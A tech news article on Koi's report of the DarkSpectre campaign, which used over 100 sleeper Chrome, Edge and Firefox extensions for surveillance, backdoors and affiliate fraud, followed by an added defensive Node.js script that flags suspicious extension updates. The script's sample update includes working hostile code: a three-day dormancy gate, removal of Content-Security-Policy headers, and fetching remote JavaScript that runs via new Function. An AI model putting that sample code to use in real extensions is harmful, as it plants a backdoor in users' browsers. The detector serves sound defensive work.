DarkSpectre Malware Campaign Infected 8.8 Million Chrome, Edge & Firefox Users

Security researchers at Koi have uncovered a massive, coordinated spyware campaign spanning more than 100 Google Chrome, Microsoft Edge, and Mozilla Firefox extensions. The extensions appear to function legitimately but eventually exhibit malicious behavior tied to a threat actor Koi calls DarkSpectre: stripping security protections, installing backdoors for remote code execution, conducting surveillance, and disabling anti-fraud protections on Chinese e-commerce affiliate links.

The DarkSpectre name comes from Koi, which attributes to the group at least three malware campaigns that have infected more than 8.8 million users over the past seven years: "The Zoom Stealer" (2.2 million victims), "ShadyPanda" (5.6 million), and "GhostPoster" (1.05 million). Their goals range from stealing corporate data to covert payload delivery and the affiliate fraud mentioned above, but all of them rely on legitimate-looking extensions to do the dirty work. In fact, the extensions usually are legitimate at first. After either a three-day dormancy period or a predetermined activation point, these "sleeper extensions" go rogue, and they have been getting away with it for a long time.

GhostPoster also includes this Opera "Google Translate" extension, conspicuously not uploaded by Google. It's been installed by almost 1 million users.

As Koi states, this "isn't three separate threat actors running similar operations. This is one highly organized operation—and while tracking their infrastructure, we stumbled onto something new: a 2.2 million user campaign stealing corporate meeting intelligence that we're disclosing for the first time."

The report further states that "This is organized. This is funded. This is strategic," and attributes DarkSpectre to a well-funded Chinese operation. That attribution rests on several indicators: server infrastructure rooted in China, Chinese-language strings in the code, affiliate fraud schemes targeting Chinese e-commerce platforms, and the sheer scale and complexity of the campaigns. Whether the operation is state-funded is not clear at this point, but the longevity and the funding required to sustain it lean strongly in that direction.

To help defend against malware like this, the researchers recommend installing "Wings", Koi's risk engine, which analyzes every extension (and each subsequent update) with a combination of static analysis, dynamic analysis, and agentic AI. In theory, other anti-malware and antivirus products should also catch these threats now that they have been identified. Considering how long the campaigns were allowed to run unchecked, however, the greatest onus would seem to be on Google, Microsoft, and Mozilla to start monitoring extension updates for malicious behavior.
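As an added illustration, not part of the original article and not Koi's Wings or any DarkSpectre code, the Node.js script below shows what "monitoring extension updates" can look like in practice. It diffs an extension's previously reviewed manifest against the new one and scans the updated JavaScript for the three behaviors described above: a time-gated sleeper delay (or a hard-coded activation date), removal of security response headers such as Content-Security-Policy, and fetch-then-execute remote code loading. The regexes, thresholds, scoring, and the sample "translator" extension it scans are all assumptions constructed for this example, not signatures from the report.

```javascript
// Added example (not Koi's Wings, not DarkSpectre code): heuristic vetting of
// a browser-extension UPDATE. Thresholds, regexes and the sample extension at
// the bottom are assumptions of this example, not signatures from the report.

const DAY_MS = 24 * 60 * 60 * 1000;

// Permissions whose first appearance in an update deserves a human look.
const SENSITIVE_PERMISSIONS = new Set(['webRequest', 'webRequestBlocking', 'declarativeNetRequest',
  'declarativeNetRequestWithHostAccess', 'scripting', 'cookies', 'tabs', 'history', 'nativeMessaging', '<all_urls>']);

// Permissions and host patterns present in the new manifest but not the old one.
function diffManifests(oldManifest, newManifest) {
  const collect = (m) => new Set([...(m.permissions || []), ...(m.host_permissions || [])]);
  const before = collect(oldManifest);
  const added = [...collect(newManifest)].filter((p) => !before.has(p));
  const sensitiveAdded = added.filter((p) => SENSITIVE_PERMISSIONS.has(p) || /^(\*|https?|file):\/\//.test(p));
  return { added, sensitiveAdded };
}

// Each rule returns a reason string when it fires, otherwise null.
const SOURCE_RULES = [
  {
    id: 'sleeper-delay',
    // Millisecond literals between 1 and 90 days, or chrome.alarms delays of a day
    // or more, are the dormancy window of a sleeper. A 10-digit literal in the
    // 1e9..2e9 range lands in the same window and may instead be a Unix-epoch
    // activation date; either way it deserves a look.
    test(src) {
      const hits = [];
      for (const m of src.matchAll(/\b\d{8,10}\b/g)) {
        const n = Number(m[0]);
        if (n >= DAY_MS && n <= 90 * DAY_MS) hits.push(`${n} ms (~${(n / DAY_MS).toFixed(1)} days)`);
      }
      for (const m of src.matchAll(/delayInMinutes\s*:\s*(\d+)/g)) {
        if (Number(m[1]) >= 24 * 60) hits.push(`alarm delay ${m[1]} min`);
      }
      return hits.length ? `dormancy window: ${hits.join(', ')}` : null;
    },
  },
  {
    id: 'csp-strip',
    // A translator, downloader or productivity extension rarely needs to name a
    // security response header at all; filtering one out is a red flag.
    test(src) {
      const m = src.match(/content-security-policy|x-frame-options|strict-transport-security/i);
      return m ? `references security header "${m[0]}"` : null;
    },
  },
  {
    id: 'remote-code',
    // Code fetched over the network and then executed is a backdoor: the payload
    // can change after store review without shipping a new version.
    test(src) {
      const fetches = /\bfetch\s*\(|XMLHttpRequest/.test(src);
      const exec = src.match(/\beval\s*\(|new\s+Function\s*\(|createElement\s*\(\s*['"]script['"]\s*\)/);
      return fetches && exec ? `fetches data and executes it via ${exec[0].trim()}` : null;
    },
  },
];

function scanSource(src) {
  return SOURCE_RULES
    .map((r) => ({ id: r.id, reason: r.test(src) }))
    .filter((h) => h.reason !== null);
}

// Combine the manifest diff and the source scan into one verdict for the update.
function assessUpdate(oldManifest, newManifest, newSource) {
  const { added, sensitiveAdded } = diffManifests(oldManifest, newManifest);
  const indicators = scanSource(newSource);
  const score = sensitiveAdded.length * 2 + indicators.length * 3;
  return {
    versions: `${oldManifest.version} -> ${newManifest.version}`,
    addedPermissions: added,
    indicators,
    score,
    verdict: score >= 5 ? 'hold for review' : score > 0 ? 'notable' : 'clean',
  };
}

// Constructed sample (illustrative, not real extension code): a benign v1.0.0
// "translator" and a v1.1.0 update that sleeps three days, strips CSP and pulls a second stage.
const MANIFEST_V1 = { version: '1.0.0', permissions: ['storage'] };
const MANIFEST_V2 = { version: '1.1.0', permissions: ['storage', 'webRequest', 'webRequestBlocking'],
  host_permissions: ['<all_urls>'] };
const SOURCE_V1 = "chrome.storage.local.set({ installedAt: Date.now() });\nfunction translate(t) { return t.toUpperCase(); }";
const SOURCE_V2 = `
chrome.storage.local.get('installedAt', ({ installedAt }) => {
  if (Date.now() - installedAt < 259200000) return; // three days of dormancy
  chrome.webRequest.onHeadersReceived.addListener((d) => ({
    responseHeaders: d.responseHeaders.filter((h) => h.name.toLowerCase() !== 'content-security-policy'),
  }), { urls: ['<all_urls>'] }, ['blocking', 'responseHeaders']);
  fetch('https://example.invalid/stage2.js').then((r) => r.text()).then((code) => new Function(code)());
});
`;

console.log(JSON.stringify(assessUpdate(MANIFEST_V1, MANIFEST_V2, SOURCE_V2), null, 2));
```

Run with `node` and the sample update is held for review with all three indicators firing and three newly added sensitive permissions, while the same check on the initial release comes back clean. That gap is the point: a sandbox run at submission time sees nothing for three days, and an update can add the gate, the header filter and the second-stage loader long after the first review, so the check has to be re-run on every revision rather than once at intake.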
Chris Harper

Christopher Harper is a tech writer with over a decade of experience writing how-tos and news. Off work, he stays sharp with gym time & stylish action games.